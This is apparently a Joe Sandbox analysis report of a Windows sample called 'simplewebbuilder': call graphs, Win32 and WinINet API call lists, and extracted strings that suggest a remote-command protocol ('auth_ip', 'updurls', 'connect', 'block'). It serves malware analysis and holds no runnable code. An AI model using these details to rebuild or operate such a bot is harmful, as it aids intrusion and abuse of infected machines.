20251->20252 20252->20251 20254 9c1110 Mailbox 68 API calls 20253->20254 20255 9bab0b WSAGetLastError 20254->20255 20255->20251 20257 9b199f 20256->20257 20258 9b19bb 20256->20258 20259 9c39a4 __cinit 68 API calls 20257->20259 20258->20246 20259->20258 20282 9be876 20260->20282 20262 9bd6f6 20262->20096 20363 9c39b9 20263->20363 20265 9c2714 20265->20098 20266 9c273d ResumeThread 20266->20098 20268 9c2736 CloseHandle 20268->20266 20270 9c1110 Mailbox 68 API calls 20269->20270 20283 9be880 __EH_prolog 20282->20283 20288 9b4030 20283->20288 20287 9be8ae 20287->20262 20300 9d59f0 20288->20300 20290 9b403a GetProcessHeap RtlAllocateHeap 20291 9b407c 20290->20291 20292 9b4053 std::exception::exception 20290->20292 20291->20287 20294 9b408a 20291->20294 20301 9bacc0 20292->20301 20295 9b4094 __EH_prolog 20294->20295 20345 9ba8df 20295->20345 20300->20290 20302 9bacca __EH_prolog 20301->20302 20309 9bd26f 20302->20309 20315 9bddcf 20309->20315 20312 9bd289 20337 9bde07 20312->20337 20318 9c2b13 20315->20318 20321 9c2b41 20318->20321 20322 9bacd9 20321->20322 20323 9c2b4f 20321->20323 20322->20312 20327 9c2bd7 20323->20327 20328 9c2b54 20327->20328 20329 9c2be0 20327->20329 20328->20322 20331 9c2b99 20328->20331 20330 9c3574 _free 59 API calls 20329->20330 20330->20328 20332 9c2ba5 _strlen 20331->20332 20333 9c2bca 20331->20333 20334 9c35ac _malloc 59 API calls 20332->20334 20333->20322 20335 9c2bb7 20334->20335 20335->20333 20336 9c72bc std::exception::_Copy_str 59 API calls 20335->20336 20336->20333 20338 9bde11 __EH_prolog 20337->20338 20341 9bbd32 20338->20341 20342 9bbd3c __EH_prolog 20341->20342 20343 9c2b13 std::exception::exception 59 API calls 20342->20343 20344 9bbd4d Mailbox 20343->20344 20356 9bb6f6 20345->20356 20347 9b40c1 20348 9b3fdc 20347->20348 20362 9d59f0 20348->20362 20350 9b3fe6 CreateEventA 20351 9b400f 20350->20351 20352 9b3ffd 20350->20352 20351->20287 20353 9b3fb0 Mailbox 68 API calls 20352->20353 20354 9b4005 20353->20354 20355 9bac81 Mailbox 60 
API calls 20354->20355 20355->20351 20357 9bb702 20356->20357 20358 9bb712 std::exception::exception 20356->20358 20357->20358 20359 9c414c _Allocate 60 API calls 20357->20359 20358->20347 20360 9c4b5a __CxxThrowException@8 RaiseException 20358->20360 20359->20358 20361 9c0127 20360->20361 20362->20350 20364 9c39db 20363->20364 20365 9c39c7 20363->20365 20367 9c906c __calloc_crt 59 API calls 20364->20367 20366 9c645b strtoxl 59 API calls 20365->20366 20368 9c39cc 20366->20368 20369 9c39e8 20367->20369 20370 9c54f5 strtoxl 9 API calls 20368->20370 20371 9c3a39 20369->20371 20374 9c625a CallCatchBlock 59 API calls 20369->20374 20373 9c270b 20370->20373 20372 9c3574 _free 59 API calls 20371->20372 20375 9c3a3f 20372->20375 20373->20265 20373->20266 20373->20268 20376 9c39f5 20374->20376 20375->20373 20382 9c643a 20375->20382 20377 9c62e1 __initptd 59 API calls 20376->20377 20379 9c39fe CreateThread 20377->20379 20379->20373 20381 9c3a31 GetLastError 20379->20381 20390 9c3b19 20379->20390 20381->20371 20387 9c6427 20382->20387 20388 9c6272 __getptd_noexit 59 API calls 20387->20388 20389 9c642c 20388->20389 20391 9c3b22 __threadstartex@4 20390->20391 20714 9c9c82 IsProcessorFeaturePresent 20711->20714 20715 9c9c96 20714->20715 20716 9c9b3e ___raise_securityfailure 5 API calls 20715->20716 20717 9c3cac 20716->20717 20719 9c2e8b 20718->20719 20720 9c645b strtoxl 59 API calls 20719->20720 20723 9c2e9b _strlen 20719->20723 20721 9c2e90 20720->20721 20722 9c54f5 strtoxl 9 API calls 20721->20722 20722->20723 20723->20117 20727 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 20726->20727 20728 9c66c5 20727->20728 20729 9c645b strtoxl 59 API calls 20728->20729 20730 9c66ca 20729->20730 20731 9c719b 20730->20731 20740 9c66ea __output_l __aulldvrm _strlen 20730->20740 20771 9ca431 20730->20771 20732 9c645b strtoxl 59 API calls 20731->20732 20734 9c71a0 20732->20734 20735 9c54f5 strtoxl 9 API calls 20734->20735 20736 9c7175 20735->20736 20737 9c4b4b ___strgtold12_l 6 API calls 
20736->20737 20738 9c2a76 20737->20738 20738->20142 20750 9c6501 20738->20750 20740->20731 20740->20736 20741 9c71d0 79 API calls _write_multi_char 20740->20741 20742 9c6d53 RtlDecodePointer 20740->20742 20743 9c3574 _free 59 API calls 20740->20743 20744 9c7244 79 API calls _write_string 20740->20744 20745 9d00e4 61 API calls __cftof 20740->20745 20746 9c90b4 __malloc_crt 59 API calls 20740->20746 20747 9c6db6 RtlDecodePointer 20740->20747 20748 9c6ddb RtlDecodePointer 20740->20748 20749 9c7218 79 API calls _write_multi_char 20740->20749 20778 9ce30e 20740->20778 20741->20740 20742->20740 20743->20740 20744->20740 20745->20740 20746->20740 20747->20740 20748->20740 20749->20740 20751 9ca431 __filbuf 59 API calls 20750->20751 20752 9c650f 20751->20752 20753 9c651a 20752->20753 20754 9c6531 20752->20754 20755 9c645b strtoxl 59 API calls 20753->20755 20756 9c6536 20754->20756 20764 9c6543 __flsbuf 20754->20764 20765 9c651f 20755->20765 20757 9c645b strtoxl 59 API calls 20756->20757 20757->20765 20758 9c659d 20759 9c65a7 20758->20759 20760 9c6621 20758->20760 20762 9c65c1 20759->20762 20767 9c65d8 20759->20767 20761 9ca455 __write 79 API calls 20760->20761 20761->20765 20793 9ca455 20762->20793 20764->20758 20764->20765 20768 9c6592 20764->20768 20781 9cfda2 20764->20781 20765->20142 20767->20765 20821 9cfdf6 20767->20821 20768->20758 20790 9cff65 20768->20790 20772 9ca43b 20771->20772 20773 9ca450 20771->20773 20774 9c645b strtoxl 59 API calls 20772->20774 20773->20740 20775 9ca440 20774->20775 20776 9c54f5 strtoxl 9 API calls 20775->20776 20777 9ca44b 20776->20777 20777->20740 20779 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 20778->20779 20780 9ce31f 20779->20780 20780->20740 20782 9cfdad 20781->20782 20783 9cfdba 20781->20783 20784 9c645b strtoxl 59 API calls 20782->20784 20785 9cfdc6 20783->20785 20786 9c645b strtoxl 59 API calls 20783->20786 20787 9cfdb2 20784->20787 20785->20768 20788 9cfde7 20786->20788 20787->20768 20789 9c54f5 strtoxl 9 API calls 
20788->20789 20789->20787 20791 9c90b4 __malloc_crt 59 API calls 20790->20791 20792 9cff7a 20791->20792 20792->20758 20794 9ca461 CallCatchBlock 20793->20794 20795 9ca46e 20794->20795 20796 9ca485 20794->20796 20797 9c6427 __read_nolock 59 API calls 20795->20797 20798 9ca524 20796->20798 20800 9ca499 20796->20800 20799 9ca473 20797->20799 20801 9c6427 __read_nolock 59 API calls 20798->20801 20802 9c645b strtoxl 59 API calls 20799->20802 20803 9ca4b7 20800->20803 20804 9ca4c1 20800->20804 20805 9ca4bc 20801->20805 20806 9ca47a CallCatchBlock 20802->20806 20807 9c6427 __read_nolock 59 API calls 20803->20807 20846 9d1287 20804->20846 20810 9c645b strtoxl 59 API calls 20805->20810 20806->20765 20807->20805 20809 9ca4c7 20811 9ca4ed 20809->20811 20812 9ca4da 20809->20812 20813 9ca530 20810->20813 20816 9c645b strtoxl 59 API calls 20811->20816 20855 9ca544 20812->20855 20815 9c54f5 strtoxl 9 API calls 20813->20815 20815->20806 20817 9ca4f2 20816->20817 20819 9c6427 __read_nolock 59 API calls 20817->20819 20818 9ca4e6 20914 9ca51c 20818->20914 20819->20818 20822 9cfe02 CallCatchBlock 20821->20822 20823 9cfe2b 20822->20823 20824 9cfe13 20822->20824 20826 9cfed0 20823->20826 20830 9cfe60 20823->20830 20825 9c6427 __read_nolock 59 API calls 20824->20825 20828 9cfe18 20825->20828 20827 9c6427 __read_nolock 59 API calls 20826->20827 20829 9cfed5 20827->20829 20831 9c645b strtoxl 59 API calls 20828->20831 20832 9c645b strtoxl 59 API calls 20829->20832 20833 9d1287 ___lock_fhandle 60 API calls 20830->20833 20834 9cfe20 CallCatchBlock 20831->20834 20835 9cfedd 20832->20835 20836 9cfe66 20833->20836 20834->20765 20837 9c54f5 strtoxl 9 API calls 20835->20837 20838 9cfe7c 20836->20838 20839 9cfe94 20836->20839 20837->20834 20840 9cfef2 __lseeki64_nolock 61 API calls 20838->20840 20841 9c645b strtoxl 59 API calls 20839->20841 20842 9cfe8b 20840->20842 20843 9cfe99 20841->20843 20947 9cfec8 20842->20947 20844 9c6427 __read_nolock 59 API calls 20843->20844 20844->20842 20847 9d1293 
CallCatchBlock 20846->20847 20848 9d12e2 RtlEnterCriticalSection 20847->20848 20849 9c8eed __lock 59 API calls 20847->20849 20850 9d1308 CallCatchBlock 20848->20850 20852 9d12b8 20849->20852 20850->20809 20851 9d12d0 20917 9d130c 20851->20917 20852->20851 20853 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 20852->20853 20853->20851 20856 9ca551 __write_nolock 20855->20856 20857 9ca585 20856->20857 20858 9ca5af 20856->20858 20859 9ca590 20856->20859 20860 9c4b4b ___strgtold12_l 6 API calls 20857->20860 20864 9ca607 20858->20864 20865 9ca5eb 20858->20865 20861 9c6427 __read_nolock 59 API calls 20859->20861 20862 9cada5 20860->20862 20863 9ca595 20861->20863 20862->20818 20866 9c645b strtoxl 59 API calls 20863->20866 20867 9ca620 20864->20867 20921 9cfef2 20864->20921 20868 9c6427 __read_nolock 59 API calls 20865->20868 20869 9ca59c 20866->20869 20871 9cfda2 __read_nolock 59 API calls 20867->20871 20872 9ca5f0 20868->20872 20873 9c54f5 strtoxl 9 API calls 20869->20873 20874 9ca62e 20871->20874 20875 9c645b strtoxl 59 API calls 20872->20875 20873->20857 20877 9ca987 20874->20877 20881 9c625a CallCatchBlock 59 API calls 20874->20881 20876 9ca5f7 20875->20876 20878 9c54f5 strtoxl 9 API calls 20876->20878 20879 9cad1a WriteFile 20877->20879 20880 9ca9a5 20877->20880 20878->20857 20882 9ca97a GetLastError 20879->20882 20891 9ca947 20879->20891 20883 9caac9 20880->20883 20889 9ca9bb 20880->20889 20885 9ca65a GetConsoleMode 20881->20885 20882->20891 20892 9caad4 20883->20892 20907 9cabbe 20883->20907 20884 9cad53 20884->20857 20890 9c645b strtoxl 59 API calls 20884->20890 20885->20877 20886 9ca699 20885->20886 20886->20877 20887 9ca6a9 GetConsoleCP 20886->20887 20887->20884 20909 9ca6d8 20887->20909 20888 9caa2a WriteFile 20888->20882 20888->20889 20889->20884 20889->20888 20889->20891 20893 9cad81 20890->20893 20891->20857 20891->20884 20894 9caaa7 20891->20894 20892->20884 20892->20891 20896 9cab39 WriteFile 20892->20896 20897 9c6427 __read_nolock 59 API calls 
20893->20897 20898 9cad4a 20894->20898 20899 9caab2 20894->20899 20895 9cac33 WideCharToMultiByte 20895->20882 20895->20907 20896->20882 20896->20892 20897->20857 20900 9c643a __dosmaperr 59 API calls 20898->20900 20901 9c645b strtoxl 59 API calls 20899->20901 20900->20857 20903 9caab7 20901->20903 20902 9cac82 WriteFile 20906 9cacd5 GetLastError 20902->20906 20902->20907 20904 9c6427 __read_nolock 59 API calls 20903->20904 20904->20857 20906->20907 20907->20884 20907->20891 20907->20895 20907->20902 20908 9d1653 WriteConsoleW CreateFileW __putwch_nolock 20908->20909 20909->20882 20909->20891 20909->20908 20910 9ca7c1 WideCharToMultiByte 20909->20910 20911 9d060a 61 API calls __write_nolock 20909->20911 20913 9ca856 WriteFile 20909->20913 20930 9ce348 20909->20930 20910->20891 20912 9ca7fc WriteFile 20910->20912 20911->20909 20912->20882 20912->20909 20913->20882 20913->20909 20946 9d162d RtlLeaveCriticalSection 20914->20946 20916 9ca522 20916->20806 20920 9c9057 RtlLeaveCriticalSection 20917->20920 20919 9d1313 20919->20848 20920->20919 20933 9d1544 20921->20933 20923 9cff02 20924 9cff0a 20923->20924 20925 9cff1b SetFilePointerEx 20923->20925 20926 9c645b strtoxl 59 API calls 20924->20926 20927 9cff33 GetLastError 20925->20927 20928 9cff0f 20925->20928 20926->20928 20929 9c643a __dosmaperr 59 API calls 20927->20929 20928->20867 20929->20928 20931 9ce30e __isleadbyte_l 59 API calls 20930->20931 20932 9ce355 20931->20932 20932->20909 20934 9d154f 20933->20934 20935 9d1564 20933->20935 20936 9c6427 __read_nolock 59 API calls 20934->20936 20938 9c6427 __read_nolock 59 API calls 20935->20938 20940 9d1589 20935->20940 20937 9d1554 20936->20937 20939 9c645b strtoxl 59 API calls 20937->20939 20941 9d1593 20938->20941 20944 9d155c 20939->20944 20940->20923 20942 9c645b strtoxl 59 API calls 20941->20942 20943 9d159b 20942->20943 20945 9c54f5 strtoxl 9 API calls 20943->20945 20944->20923 20945->20944 20946->20916 20950 9d162d RtlLeaveCriticalSection 20947->20950 20949 9cfece 
20949->20834 20950->20949 20951->20146 20953 9be930 __EH_prolog 20952->20953 20954 9c414c _Allocate 60 API calls 20953->20954 20955 9be939 20954->20955 20956 9b1bfa RtlEnterCriticalSection 20955->20956 20958 9beb47 20955->20958 20956->20151 20959 9beb51 __EH_prolog 20958->20959 20962 9b26db RtlEnterCriticalSection 20959->20962 20961 9beba7 20961->20956 20963 9b2728 CreateWaitableTimerA 20962->20963 20964 9b277e 20962->20964 20965 9b275b SetWaitableTimer 20963->20965 20966 9b2738 GetLastError 20963->20966 20967 9b27d5 RtlLeaveCriticalSection 20964->20967 20969 9c414c _Allocate 60 API calls 20964->20969 20965->20964 20968 9c1110 Mailbox 68 API calls 20966->20968 20967->20961 20970 9b2745 20968->20970 20971 9b278a 20969->20971 21006 9b1712 20970->21006 20973 9c414c _Allocate 60 API calls 20971->20973 20974 9b27c8 20971->20974 20975 9b27a9 20973->20975 21012 9b83f9 20974->21012 20978 9b1cf8 CreateEventA 20975->20978 20979 9b1d23 GetLastError 20978->20979 20980 9b1d52 CreateEventA 20978->20980 20983 9b1d33 20979->20983 20981 9b1d6b GetLastError 20980->20981 20982 9b1d96 20980->20982 20986 9b1d7b 20981->20986 20984 9c39b9 __beginthreadex 201 API calls 20982->20984 20985 9c1110 Mailbox 68 API calls 20983->20985 20987 9b1db6 20984->20987 20990 9b1d3c 20985->20990 20991 9c1110 Mailbox 68 API calls 20986->20991 20988 9b1e0d 20987->20988 20989 9b1dc6 GetLastError 20987->20989 20994 9b1e1d 20988->20994 20995 9b1e11 WaitForSingleObject FindCloseChangeNotification 20988->20995 20996 9b1dd8 20989->20996 20992 9b1712 60 API calls 20990->20992 20993 9b1d84 20991->20993 20997 9b1d4e 20992->20997 20998 9b1712 60 API calls 20993->20998 20994->20974 20995->20994 20999 9b1ddf 20996->20999 21000 9b1ddc CloseHandle 20996->21000 20997->20980 20998->20982 21001 9b1de9 CloseHandle 20999->21001 21002 9b1dee 20999->21002 21000->20999 21001->21002 21003 9c1110 Mailbox 68 API calls 21002->21003 21004 9b1dfb 21003->21004 21005 9b1712 60 API calls 21004->21005 21005->20988 21007 9b171c __EH_prolog 
21006->21007 21008 9b173e 21007->21008 21009 9b1815 Mailbox 59 API calls 21007->21009 21008->20965 21010 9b1732 21009->21010 21015 9baa98 21010->21015 21013 9b8415 21012->21013 21014 9b8406 CloseHandle 21012->21014 21013->20967 21014->21013 21016 9baaa2 __EH_prolog 21015->21016 21023 9bcffd 21016->21023 21020 9baac3 21021 9c4b5a __CxxThrowException@8 RaiseException 21020->21021 21022 9baad1 21021->21022 21024 9bb824 std::bad_exception::bad_exception 60 API calls 21023->21024 21025 9baab5 21024->21025 21026 9bd039 21025->21026 21027 9bd043 __EH_prolog 21026->21027 21030 9bb7d3 21027->21030 21029 9bd072 Mailbox 21029->21020 21031 9bb7dd __EH_prolog 21030->21031 21032 9bb824 std::bad_exception::bad_exception 60 API calls 21031->21032 21033 9bb7ee Mailbox 21032->21033 21033->21029 21045 9b30ae WSASetLastError 21034->21045 21037 9b30ae 71 API calls 21038 9b3c90 21037->21038 21039 9b16ae 21038->21039 21041 9b16b8 __EH_prolog 21039->21041 21040 9b1701 21040->20160 21041->21040 21042 9c2ad3 std::exception::exception 59 API calls 21041->21042 21043 9b16dc 21042->21043 21044 9baa98 60 API calls 21043->21044 21044->21040 21046 9b30ce 21045->21046 21047 9b30ec WSAStringToAddressA 21045->21047 21046->21047 21049 9b30d3 21046->21049 21048 9baaff 69 API calls 21047->21048 21050 9b3114 21048->21050 21051 9c1110 Mailbox 68 API calls 21049->21051 21052 9b3154 21050->21052 21055 9b311e _memcmp 21050->21055 21060 9b30d8 21051->21060 21053 9b3135 21052->21053 21058 9c1110 Mailbox 68 API calls 21052->21058 21054 9b3193 21053->21054 21056 9c1110 Mailbox 68 API calls 21053->21056 21059 9c1110 Mailbox 68 API calls 21054->21059 21054->21060 21055->21053 21057 9c1110 Mailbox 68 API calls 21055->21057 21056->21054 21057->21053 21058->21053 21059->21060 21060->21037 21060->21038 21062 9b3bdd __EH_prolog 21061->21062 21063 9b3bfe htonl htonl 21062->21063 21073 9c2ab7 21062->21073 21063->20166 21068 9b3c20 __EH_prolog 21067->21068 21069 9b3c41 21068->21069 21070 9c2ab7 
std::bad_exception::bad_exception 59 API calls 21068->21070 21069->20166 21071 9b3c35 21070->21071 21072 9bac4d 60 API calls 21071->21072 21072->21069 21074 9c2ad3 std::exception::exception 59 API calls 21073->21074 21075 9b3bf2 21074->21075 21076 9bac4d 21075->21076 21077 9bac57 __EH_prolog 21076->21077 21084 9bd170 21077->21084 21091 9c2a9c 21084->21091 21087 9bd1ac 21088 9bd1b6 __EH_prolog 21087->21088 21094 9bbb42 21088->21094 21092 9c2b13 std::exception::exception 59 API calls 21091->21092 21093 9bac64 21092->21093 21093->21087 21095 9bbb4c __EH_prolog 21094->21095 21096 9c2a9c std::bad_exception::bad_exception 59 API calls 21095->21096 21119 9b353e 21098->21119 21102 9b2ae8 WSASetLastError connect 21101->21102 21103 9b2ad8 21101->21103 21105 9baaff 69 API calls 21102->21105 21104 9c1110 Mailbox 68 API calls 21103->21104 21106 9b2add 21104->21106 21107 9b2b07 21105->21107 21108 9c1110 Mailbox 68 API calls 21106->21108 21107->21106 21109 9c1110 Mailbox 68 API calls 21107->21109 21110 9b2b1b 21108->21110 21109->21106 21111 9c1110 Mailbox 68 API calls 21110->21111 21113 9b2b38 21110->21113 21111->21113 21115 9b2b87 21113->21115 21179 9b3027 21113->21179 21115->20172 21120 9b3548 __EH_prolog 21119->21120 21121 9b3557 21120->21121 21122 9b3576 21120->21122 21123 9b1996 68 API calls 21121->21123 21141 9b2edd WSASetLastError WSASocketA 21122->21141 21140 9b355f 21123->21140 21126 9b35ad CreateIoCompletionPort 21127 9b35db 21126->21127 21128 9b35c5 GetLastError 21126->21128 21130 9c1110 Mailbox 68 API calls 21127->21130 21129 9c1110 Mailbox 68 API calls 21128->21129 21140->20169 21142 9c1110 Mailbox 68 API calls 21141->21142 21143 9b2f0a WSAGetLastError 21142->21143 21144 9b2f41 21143->21144 21145 9b2f21 21143->21145 21144->21126 21144->21140 21146 9b2f3c 21145->21146 21147 9b2f27 setsockopt 21145->21147 21148 9c1110 Mailbox 68 API calls 21146->21148 21147->21146 21148->21144 21180 9b303b 21179->21180 21181 9b304d WSASetLastError select 21179->21181 21183 9c1110 
Mailbox 68 API calls 21180->21183 21182 9baaff 69 API calls 21181->21182 21196 9b2dca 21195->21196 21197 9b2de4 21195->21197 21199 9c1110 Mailbox 68 API calls 21196->21199 21198 9b2dfc 21197->21198 21200 9b2def 21197->21200 21209 9b2d39 WSASetLastError WSASend 21198->21209 21203 9b2dcf 21199->21203 21202 9c1110 Mailbox 68 API calls 21200->21202 21202->21203 21203->20175 21210 9baaff 69 API calls 21209->21210 21211 9b2d6e 21210->21211 21212 9b2d82 21211->21212 21213 9b2d75 21211->21213 21273 9b3770 21272->21273 21274 9b3755 InterlockedCompareExchange 21272->21274 21276 9c1110 Mailbox 68 API calls 21273->21276 21274->21273 21275 9b3765 21274->21275 21277 9b32ab 78 API calls 21275->21277 21278 9b3779 21276->21278 21277->21273 21279 9b29ee 76 API calls 21278->21279 21280 9b378e 21279->21280 21280->20201 21310 9c3cad 21281->21310 21283 9b54dc 21283->20211 21284 9c3f06 21283->21284 21285 9c3f12 CallCatchBlock 21284->21285 21286 9c3f48 21285->21286 21287 9c3f30 21285->21287 21289 9c3f40 CallCatchBlock 21285->21289 21452 9c9df2 21286->21452 21288 9c645b strtoxl 59 API calls 21287->21288 21291 9c3f35 21288->21291 21289->20213 21293 9c54f5 strtoxl 9 API calls 21291->21293 21293->21289 21298 9c4090 CallCatchBlock 21297->21298 21299 9c40bc 21298->21299 21300 9c40a4 21298->21300 21303 9c9df2 __lock_file 60 API calls 21299->21303 21306 9c40b4 CallCatchBlock 21299->21306 21301 9c645b strtoxl 59 API calls 21300->21301 21302 9c40a9 21301->21302 21304 9c54f5 strtoxl 9 API calls 21302->21304 21305 9c40ce 21303->21305 21304->21306 21479 9c4018 21305->21479 21306->20211 21313 9c3cb9 CallCatchBlock 21310->21313 21311 9c3ccb 21312 9c645b strtoxl 59 API calls 21311->21312 21314 9c3cd0 21312->21314 21313->21311 21315 9c3cf8 21313->21315 21316 9c54f5 strtoxl 9 API calls 21314->21316 21329 9c9ec8 21315->21329 21326 9c3cdb CallCatchBlock @_EH4_CallFilterFunc@8 21316->21326 21318 9c3cfd 21319 9c3d06 21318->21319 21320 9c3d13 21318->21320 21321 9c645b strtoxl 59 API calls 21319->21321 21322 
9c3d3c 21320->21322 21323 9c3d1c 21320->21323 21321->21326 21344 9c9fe7 21322->21344 21324 9c645b strtoxl 59 API calls 21323->21324 21324->21326 21326->21283 21330 9c9ed4 CallCatchBlock 21329->21330 21331 9c8eed __lock 59 API calls 21330->21331 21342 9c9ee2 21331->21342 21332 9c9f56 21374 9c9fde 21332->21374 21333 9c9f5d 21335 9c90b4 __malloc_crt 59 API calls 21333->21335 21337 9c9f64 21335->21337 21336 9c9fd3 CallCatchBlock 21336->21318 21337->21332 21340 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 21337->21340 21338 9c8f75 __mtinitlocknum 59 API calls 21338->21342 21341 9c9f8a RtlEnterCriticalSection 21340->21341 21341->21332 21342->21332 21342->21333 21342->21338 21364 9c9e31 21342->21364 21369 9c9e9b 21342->21369 21353 9ca004 21344->21353 21345 9ca018 21347 9c645b strtoxl 59 API calls 21345->21347 21346 9ca1bf 21346->21345 21349 9ca21b 21346->21349 21348 9ca01d 21347->21348 21350 9c54f5 strtoxl 9 API calls 21348->21350 21385 9d0e30 21349->21385 21352 9c3d47 21350->21352 21361 9c3d69 21352->21361 21353->21345 21353->21346 21379 9d0e4e 21353->21379 21358 9d0f7d __openfile 59 API calls 21359 9ca1d7 21358->21359 21359->21346 21360 9d0f7d __openfile 59 API calls 21359->21360 21360->21346 21445 9c9e61 21361->21445 21363 9c3d6f 21363->21326 21365 9c9e3c 21364->21365 21366 9c9e52 RtlEnterCriticalSection 21364->21366 21367 9c8eed __lock 59 API calls 21365->21367 21366->21342 21368 9c9e45 21367->21368 21368->21342 21370 9c9ebc RtlLeaveCriticalSection 21369->21370 21371 9c9ea9 21369->21371 21370->21342 21377 9c9057 RtlLeaveCriticalSection 21371->21377 21373 9c9eb9 21373->21342 21378 9c9057 RtlLeaveCriticalSection 21374->21378 21376 9c9fe5 21376->21336 21377->21373 21378->21376 21388 9d0e66 21379->21388 21381 9ca185 21381->21345 21382 9d0f7d 21381->21382 21396 9d0f95 21382->21396 21384 9ca1b8 21384->21346 21384->21358 21403 9d0d19 21385->21403 21387 9d0e49 21387->21352 21389 9d0e7b 21388->21389 21395 9d0e74 21388->21395 21390 9c287b 
Call graph (continued; edge list not reproduced): C runtime helpers in the 0x9c28xx-0x9d16xx range (_LocaleUpdate, strtoxl, _free, __malloc_crt, __dosmaperr, ___crtIsPackagedApp, __lock, _memmove, __flsbuf, __filbuf, __write, __flush, __fsopen, __read_nolock, ___lock_fhandle, __lseeki64_nolock; imports AreFileApisANSI, MultiByteToWideChar, GetLastError, RtlEnterCriticalSection, RtlLeaveCriticalSection), a routine at 0x40d67e calling GetLastError and LoadLibraryExA, and a resource loader reached from 0x40283e at 0x401f64 calling FindResourceA, GetLastError, SizeofResource, LoadResource, LockResource, GlobalAlloc and GetTickCount.

Control-flow Graph
(function 0x9b78a7-0x9b8156; basic-block edge list and executed/not-executed colouring not reproduced: a WinINet fetch loop over InternetOpenA, InternetSetOptionA, InternetOpenUrlA, InternetReadFile and InternetCloseHandle, followed by parsing of the reply under RtlEnterCriticalSection/RtlLeaveCriticalSection with _strtok/_swscanf and a Sleep before returning to the 0x9b6cf0 main loop)
                                                                                                                            APIs
                                                                                                                            • InternetOpenA.WININET(?), ref: 009B78B1
                                                                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 009B78D9
                                                                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 009B78F1
                                                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 009B7909
                                                                                                                            • _memset.LIBCMT ref: 009B7919
                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 009B7932
                                                                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 009B7954
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 009B7974
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 009B797F
                                                                                                                            • _memset.LIBCMT ref: 009B79C7
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B79EA
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B79FB
                                                                                                                            • _malloc.LIBCMT ref: 009B7A94
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B7AA6
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B7AB2
                                                                                                                            • _memset.LIBCMT ref: 009B7ACC
                                                                                                                            • _memset.LIBCMT ref: 009B7ADE
                                                                                                                            • _memset.LIBCMT ref: 009B7AF1
                                                                                                                            • _memset.LIBCMT ref: 009B7B04
                                                                                                                            • _memset.LIBCMT ref: 009B7B1A
                                                                                                                            • _malloc.LIBCMT ref: 009B7B91
                                                                                                                            • _memset.LIBCMT ref: 009B7B9D
                                                                                                                            • _strtok.LIBCMT ref: 009B7BBF
                                                                                                                            • _swscanf.LIBCMT ref: 009B7BD6
                                                                                                                            • _strtok.LIBCMT ref: 009B7BED
                                                                                                                            • _free.LIBCMT ref: 009B7BF9
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 009B7CF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet_memset$CriticalSection$Option$CloseEnterHandleLeaveOpen_malloc_strtok$FileReadSleep_free_swscanf
                                                                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                                                            • API String ID: 312459958-1839899575
                                                                                                                            • Opcode ID: e958a76d090e9733290a7bc173d00963a783d3a0c841cc4f6fc663645415d18e
                                                                                                                            • Instruction ID: 97c04fd3281e90212ac287469746f4cf242656ad85cb1abd23835b4313266f47
                                                                                                                            • Opcode Fuzzy Hash: e958a76d090e9733290a7bc173d00963a783d3a0c841cc4f6fc663645415d18e
                                                                                                                            • Instruction Fuzzy Hash: 0A32FF3154C381ABD730AB64CD45BEBBBE8AFC5720F10491EF589972A2DB709944CB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.NTDLL(009E81E8), ref: 009B69FA
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009B6A11
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A1A
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009B6A29
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A2C
                                                                                                                            • GetTickCount.KERNEL32 ref: 009B6AAE
                                                                                                                            • GetVersionExA.KERNEL32(009E8038), ref: 009B6B1F
                                                                                                                            • _memset.LIBCMT ref: 009B6B3E
                                                                                                                            • _malloc.LIBCMT ref: 009B6B4B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B5B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B66
                                                                                                                            • _malloc.LIBCMT ref: 009B6B71
                                                                                                                            • _malloc.LIBCMT ref: 009B6B7C
                                                                                                                            • _malloc.LIBCMT ref: 009B6B89
                                                                                                                            • _malloc.LIBCMT ref: 009B6B94
                                                                                                                            • _malloc.LIBCMT ref: 009B6BA3
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 009B6BBA
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B6BC3
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009B6BD2
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B6BD5
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009B6BE0
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B6BE3
                                                                                                                            • _memset.LIBCMT ref: 009B6BF6
